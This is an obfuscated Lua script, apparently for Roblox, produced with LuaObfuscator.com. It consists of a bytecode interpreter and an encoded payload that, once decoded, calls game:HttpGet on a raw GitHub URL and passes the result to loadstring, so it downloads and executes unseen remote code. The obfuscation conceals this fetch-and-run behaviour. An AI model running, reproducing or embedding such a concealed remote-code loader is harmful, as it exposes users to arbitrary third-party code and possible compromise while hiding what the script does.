--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v112=v5(v87,v19);v19=nil;return v112;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%(2^(((v33-((1638 -(1523 + 114)) -0)) -(v32-(2 -1))) + ((558 + 62) -(555 + 64)))) ;return v88-(v88%1) ;else local v89=931 -(857 + 74) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (1321 -(16 + 52 + 997))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(958 -(892 + 65))) then return (v42 * (40022563 -23245347)) + (v41 * ((297413 -176275) -55602)) + (v40 * ((345 + 124) -213)) + v39 ;end if (v38==(350 -(87 + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (184 -(67 + 113)) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,1,972 -(802 + 150) ) * ((5 -3)^(57 -25))) + v43 ;local v47=v20(v44,16 + 5 ,1028 -(915 + 82) );local v48=((v20(v44,90 -(76 -(10 + 8)) )==(1 + 0)) and  -(1 -(0 -0))) or (1188 -(1069 + 118)) ;if (v47==(0 -0)) then if (v46==(0 -(442 -(416 + 26)))) then return v48 * (0 + 0) ;else v47=3 -2 ;v45=0 -0 ;end elseif (v47==2047) then return ((v46==0) and (v48 * ((1 + 0)/((340 + 451) -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-((5686 -2472) -2191) ) * (v45 + (v46/(2^52))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(438 -(145 + 293))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(431 -(44 + 386)) );v18=v18 + v49 ;local v51={};for v67=1487 -(318 + 680 + 488) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 396 -(115 + 281) ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(0 -0)) then local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if (v117~=(0 -0)) then else v118=(function() return 0;end)();while true do if (v118==(0 -0)) then v92=(function() return v93();end)();v94=(function() return nil;end)();v118=(function() return 1;end)();end if (1==v118) then v91=(function() return  #",";end)();break;end end break;end end end if (v91== #".") then if (v92== #"!") then v94=(function() return v93()~=(867 -(550 + 317)) ;end)();elseif (v92==(2 -0)) then v94=(function() return v95();end)();elseif (v92== #"xxx") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v53=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();while true do if (v102==0) then v103=(function() return 0 -0 ;end)();while true do if (v103==0) then local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124~=(285 -(134 + 151))) then else v125=(function() return 0;end)();while true do if (v125~=(1665 -(970 + 695))) then else local v179=(function() return 0 -0 ;end)();while true do if (v179~=(1990 -(582 + 1408))) then else v99[v100-#"!" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"[",v58 do FlatIdent_1743D,Type,v21,Cons,v24,v25,v59,v69=(function() return v52(FlatIdent_1743D,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"-19"]=(function() return v21();end)();for v70= #">",v23() do local v71=(function() return v21();end)();if (v20(v71, #"]", #"\\")==0) then local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if ((2 -0)==v107) then while true do if (v108==2) then local v135=(function() return 0;end)();local v136=(function() return;end)();while true do if (v135~=(0 -0)) then else v136=(function() return 0;end)();while true do if (v136==(1824 -(1195 + 629))) then if (v20(v110, #",", #"[")== #"<") then v111[2 -0 ]=(function() return v59[v111[2]];end)();end if (v20(v110,243 -(187 + 54) ,782 -(162 + 618) )~= #"~") then else v111[ #"-19"]=(function() return v59[v111[ #"19("]];end)();end v136=(function() return 1;end)();end if (1==v136) then v108=(function() return  #"91(";end)();break;end end break;end end end if (v108~=(0 + 0)) then else local v137=(function() return 0;end)();local v138=(function() return;end)();while true do if (v137~=0) then else v138=(function() return 0 + 0 ;end)();while true do if (v138==0) then v109=(function() return v20(v71,3 -1 , #"asd");end)();v110=(function() return v20(v71, #"0836",6);end)();v138=(function() return 1;end)();end if (1~=v138) then else v108=(function() return  #"~";end)();break;end end break;end end end if (v108== #"xxx") then if (v20(v110, #"-19", #"91(")== #"!") then v111[ #"asd1"]=(function() return v59[v111[ #"asd1"]];end)();end v54[v70]=(function() return v111;end)();break;end if (v108== #",") then local v140=(function() return 0 -0 ;end)();while true do if (v140~=(1 + 0)) then else v108=(function() return 1638 -(1373 + 263) ;end)();break;end if (v140==(1000 -(451 + 549))) then v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==(0 -0)) then local v180=(function() return 0 -0 ;end)();local v181=(function() return;end)();while true do if (0==v180) then v181=(function() return 1384 -(746 + 638) ;end)();while true do if (v181==0) then v111[ #"asd"]=(function() return v22();end)();v111[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v109== #"~") then v111[ #"-19"]=(function() return v23();end)();elseif (v109==2) then v111[ #"asd"]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v109== #"gha") then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if (v191==(341 -(218 + 123))) then v192=(function() return 1581 -(1535 + 46) ;end)();while true do if (v192==(0 + 0)) then v111[ #"asd"]=(function() return v23() -(2^16) ;end)();v111[ #".dev"]=(function() return v22();end)();break;end end break;end end end v140=(function() return 1 + 0 ;end)();end end end end break;end if (v107==(561 -(306 + 254))) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120~=0) then else v121=(function() return 0;end)();while true do if (v121==(1 + 0)) then v107=(function() return 3 -1 ;end)();break;end if (v121==0) then v110=(function() return nil;end)();v111=(function() return nil;end)();v121=(function() return 1468 -(899 + 568) ;end)();end end break;end end end if (v107==0) then local v122=(function() return 0 + 0 ;end)();local v123=(function() return;end)();while true do if (0~=v122) then else v123=(function() return 0 -0 ;end)();while true do if (v123~=(604 -(268 + 335))) then else v107=(function() return 291 -(60 + 230) ;end)();break;end if (v123==(572 -(426 + 146))) then v108=(function() return 0;end)();v109=(function() return nil;end)();v123=(function() return 1 + 0 ;end)();end end break;end end end end end end for v72= #">",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1457 -(282 + 1174) ];local v65=v61[813 -(569 + 242) ];local v66=v61[8 -5 ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=1 + 0 ;local v78= -(1025 -(706 + 318));local v79={};local v80={...};local v81=v12("#",...) -(1272 -(945 + 326)) ;local v82={};local v83={};for v104=0 -0 ,v81 do if ((3417<=3829) and (v104>=v75)) then v79[v104-v75 ]=v80[v104 + 1 + 0 ];else v83[v104]=v80[v104 + (701 -(271 + 429)) ];end end local v84=(v81-v75) + (3 -2) + 0 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if ((v86<=(1506 -((3069 -(1477 + 184)) + (124 -32)))) or (4947<2722)) then if ((2408<=4457) and (v86<=(1088 -(461 + 625)))) then if (v86<=((1201 + 87) -(993 + 295))) then local v126=405 -(118 + 287) ;local v127;local v128;local v129;local v130;while true do if (v126==(3 -2)) then v78=(v129 + v127) -((1978 -(564 + 292)) -(118 + 1003)) ;v130=0 + 0 ;v126=5 -3 ;end if ((1173 -(418 + 753))==v126) then for v163=v127,v78 do local v164=0 + 0 ;while true do if (v164==((0 -0) + 0)) then v130=v130 + 1 + 0 ;v83[v163]=v128[v130];break;end end end break;end if ((v126==(0 + 0)) or (2851<1455)) then v127=v85[(2950 -1971) -(553 + (728 -(244 + 60))) ];v128,v129=v76(v83[v127](v13(v83,v127 + (530 -(313 + 93 + (599 -(41 + 435)))) ,v85[(2773 -(938 + 63)) -(1749 + 20) ])));v126=1;end end elseif ((v86>(1 + 0)) or (443==636)) then local v143=1322 -(1249 + 73) ;local v144;while true do if (v143==(0 + 0)) then v144=v85[2 + 0 ];v83[v144]=v83[v144](v13(v83,v144 + 1 + 0 ,v78));break;end end else v83[v85[1147 -(466 + 679) ]]=v63[v85[6 -3 ]];end elseif (v86<=(11 -7)) then if (v86>((5 + 1) -(1128 -(936 + 189)))) then do return;end else v83[v85[5 -3 ]]=v63[v85[1903 -(106 + 1794) ]];end elseif ((4061>=280) and (v86>(2 + 3))) then v83[v85[1 + 0 + 1 ]]=v85[14 -11 ];else v83[v85[5 -3 ]]();end elseif (v86<=9) then if ((v86<=(3 + 4)) or (1513>1590)) then local v131=v85[5 -3 ];local v132,v133=v76(v83[v131](v13(v83,v131 + (115 -(4 + 110)) ,v85[1616 -(1565 + 48) ])));v78=(v133 + v131) -(585 -(57 + 527)) ;local v134=(882 + 545) -(41 + 1386) ;for v141=v131,v78 do local v142=103 -(17 + 86) ;while true do if ((v142==(0 + 0)) or (2166<1293)) then v134=v134 + (1 -0) ;v83[v141]=v132[v134];break;end end end elseif ((v86>(23 -15)) or (2579<123)) then local v151=166 -(122 + 44) ;local v152;local v153;while true do if (v151==((2269 -(782 + 356)) -(369 + (1028 -(176 + 91))))) then v83[v152 + (1 -0) ]=v153;v83[v152]=v153[v85[10 -6 ]];break;end if (v151==(0 -(0 -0))) then v152=v85[2 + 0 ];v153=v83[v85[1 + 2 ]];v151=1 + 0 ;end end else do return;end end elseif (v86<=(21 -10)) then if (v86==(75 -((1122 -(975 + 117)) + 35))) then v83[v85[2 + (1875 -(157 + 1718)) ]]();else local v154=1257 -(1043 + 214) ;local v155;local v156;while true do if ((v154==1) or (846>=2368)) then v83[v155 + 1 + 0 + 0 ]=v156;v83[v155]=v156[v85[15 -11 ]];break;end if ((v154==(1212 -(323 + (3155 -2266)))) or (4012<=3358)) then v155=v85[5 -3 ];v156=v83[v85[583 -(361 + (748 -529)) ]];v154=321 -(53 + 267) ;end end end elseif (v86==(3 + 9)) then local v157=v85[415 -(15 + 398) ];v83[v157]=v83[v157](v13(v83,v157 + (1976 -(1913 + 62)) ,v78));else v83[v85[984 -(18 + 964) ]]=v85[11 -8 ];end v77=v77 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403463Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F64776D656D64772F6F64776D656D64772F726566732F68656164732F6D61696E2F2Q6B00083Q0012033Q00013Q001203000100023Q00200B000100010003001206000300044Q0007000100034Q000C5Q00022Q00053Q000100012Q00083Q00017Q00",v9(),...);
